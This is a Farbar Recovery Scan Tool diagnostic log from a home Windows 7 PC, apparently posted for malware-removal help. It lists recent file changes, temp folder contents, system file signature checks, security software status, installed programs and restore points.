2014-10-14 15:20 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 15:20 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 15:20 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 15:20 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 15:20 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 15:20 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 15:20 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 15:20 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 15:20 - 2014-07-06 20:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 15:20 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00533200 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 15:20 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 15:19 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 15:19 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 15:19 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 15:19 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 15:19 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 15:19 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 15:19 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 15:19 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 15:19 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 15:19 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 15:19 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 15:19 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 15:19 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 15:19 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 15:19 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 15:19 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 15:19 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 15:19 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 15:18 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 15:18 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 15:17 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 15:17 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 15:17 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 15:17 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 15:17 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 15:17 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 15:17 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 15:17 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 15:17 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 17:43 - 2012-06-09 02:40 - 01546012 _____ () C:\Windows\WindowsUpdate.log
2014-11-07 17:39 - 2012-01-02 04:18 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-07 17:36 - 2013-10-27 14:17 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
2014-11-07 17:36 - 2013-10-27 14:17 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
2014-11-07 15:53 - 2012-08-05 23:52 - 00000000 ____D () C:\Users\Ryan\Documents\Bluetooth Folder
2014-11-06 16:18 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-06 16:18 - 2009-07-13 23:45 - 00027744 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-06 16:11 - 2012-05-04 13:49 - 00073946 _____ () C:\Windows\setupact.log
2014-11-06 16:11 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-05 17:45 - 2009-07-14 00:13 - 00006214 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 15:31 - 2012-08-10 11:38 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps
2014-11-03 21:28 - 2012-11-08 14:14 - 00000000 ____D () C:\Users\Ryan\.gimp-2.8
2014-11-03 18:23 - 2012-05-18 18:17 - 00264590 _____ () C:\Windows\PFRO.log
2014-11-03 15:18 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan
2014-11-03 15:18 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2014-11-01 17:00 - 2013-10-16 05:44 - 00000000 ____D () C:\Users\Ryan\Documents\Postcolonial Medicine
2014-10-31 14:58 - 2014-04-12 01:42 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-30 20:43 - 2013-01-18 22:39 - 00708608 ___SH () C:\Users\Ryan\Desktop\Thumbs.db
2014-10-30 06:25 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-29 15:49 - 2014-04-12 01:42 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-22 16:31 - 2013-10-27 14:17 - 00003872 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA
2014-10-22 16:31 - 2013-10-27 14:17 - 00003476 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core
2014-10-21 10:22 - 2012-08-28 22:49 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Microsoft Help
2014-10-15 18:46 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 15:38 - 2013-10-25 17:22 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-15 15:29 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-15 15:27 - 2009-07-13 23:45 - 00342240 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 15:25 - 2014-05-06 23:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 02:01 - 2012-08-28 22:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 01:57 - 2014-05-09 16:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 01:54 - 2014-05-09 16:11 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-13 16:36 - 2012-09-17 11:31 - 00000000 ____D () C:\Users\Ryan\Documents\Personal Statement Docs
2014-10-13 15:01 - 2013-02-09 15:54 - 00000000 ____D () C:\Users\Ryan\Documents\Poems
2014-10-12 22:37 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype
Some content of TEMP:
====================
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-11-05 19:02
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Ryan at 2014-11-07 18:14:02
Running from C:\Users\Ryan\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.122 - Atheros)
Atheros WLAN Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 7.0 - Atheros)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cirrus Logic Audio (HKLM-x32\...\{3A69FD31-5EE7-42C9-918B-81C07AA21043}) (Version: 10.14.0.0 - Cirrus Logic)
Cirrus Logic Audio x64 (Version: 7.25.38.0 - Cirrus Logic) Hidden
Common Desktop Agent (Version: 1.62.0 - OEM) Hidden
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Garmin ANT Agent (HKLM\...\{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GIMP 2.8.2 (HKLM\...\GIMP-2_is1) (Version: 2.8.2 - The GIMP Team)
Google Talk Plugin (HKLM-x32\...\{95763F66-297E-30CE-9728-6D0F20BF97F5}) (Version: 5.38.5.0 - Google)
GoToMeeting 5.3.0.1009 (HKCU\...\GoToMeeting) (Version: 5.3.0.1009 - CitrixOnline)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36279 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.10.1464 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2752 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
NVIDIA Graphics Driver 296.28 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.28 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)
Perfect Photo Suite 7.0.1 (HKLM-x32\...\{6727F16E-6BF0-4E73-AC73-958A382AA09E}) (Version: 7.0.1 - onOne Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.3000 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30130 - Realtek Semiconductor Corp.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.21.00(2/3/2014) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.60.40.03 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
SES Driver (HKLM\...\{D8CC254C-C671-4664-9A38-FA368D1E2C97}) (Version: 1.0.0 - Western Digital)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.10.1 - Tweaking.com)
USB3Setup (HKLM-x32\...\{4814105D-5756-4CD7-9430-ADA474A3E192}) (Version: 1.0.4.220 - VIZIO)
VIZIO Wireless Driver (HKLM-x32\...\{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}) (Version: 1.00.0001 - VIZIO)
VIZIO Wireless Touchpad (HKLM-x32\...\{3F0E78CA-735E-446D-8E60-69C6CA27EC95}) (Version: 1.00.0001 - VIZIO)
VIZIO_FN_Key_Utility (HKLM-x32\...\{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}) (Version: 1.3.15 - VIZIO)
VIZIOUtility version 1.0 (HKLM-x32\...\{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1) (Version: 1.0 - VIZIO)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2) (HKLM\...\24DA573F901348FFDFF7717497830D45BE0C362E) (Version: 07/07/2009 1.12.2 - Dynastream Innovations)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0) (HKLM\...\4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20) (Version: 01/19/2011 1.0.0009.0 - Western Digital Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zune (HKLM\...\Zune) (Version: 04.07.1404.01 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1009\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
==================== Restore Points =========================
02-11-2014 03:30:39 End of disinfection
03-11-2014 22:05:12 Windows Update
